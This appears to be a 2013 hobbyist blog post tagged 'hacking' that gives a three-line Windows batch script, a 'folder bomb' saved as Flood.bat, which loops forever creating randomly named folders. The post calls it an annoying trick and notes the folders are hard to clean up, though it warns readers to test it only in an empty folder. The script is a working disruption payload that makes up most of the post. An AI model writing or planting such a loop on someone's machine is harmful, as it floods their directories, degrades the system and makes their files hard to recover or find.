technology loader

Sunday 24 November 2013

Freeze the computer in seconds (Folder Bomb)

Posted by Rajat Khandelwal  |  at  Sunday, November 24, 2013 No comments

hacking

Here is a great and annoying batch file trick with only three lines of coding. When the batch file is opened the batch file enters an infinite loop creating new folders at a very fast rate. It can create more than 1000 folders in just 7 seconds! Cleaning the newly made folders will be real difficult if the batch file is opened in a directory with a lot of important files and folders.

Follow the steps to create the folder bomb.

Step 1: Open notepad and type the following code in.


:techieCode
md %random%
goto techieCode


Step 2: Save as Flood.bat. Remember to include .bat extension.

That's it! Your folder bomb is ready for action!
WARNING: If you want to test this batch file, open the batch file in a new and empty folder. Do not open the batch file on your desktop or other important directories.
Remember to like and share the post.
 Subscribe to the blog to keep up to date!

opensource About the Author

I am a computer hobbyist, tech and Linux enthusiast. I blog at rtechieCode.blogspot.in. To know more catch me through Social media and feel free to write me at techieCode@live.com

Follow Me

Get Updates

Subscribe to our e-mail newsletter to receive updates.

Share This Post

Related posts

0 comments:

Blogger templates. Proudly Powered by Blogger.
back to top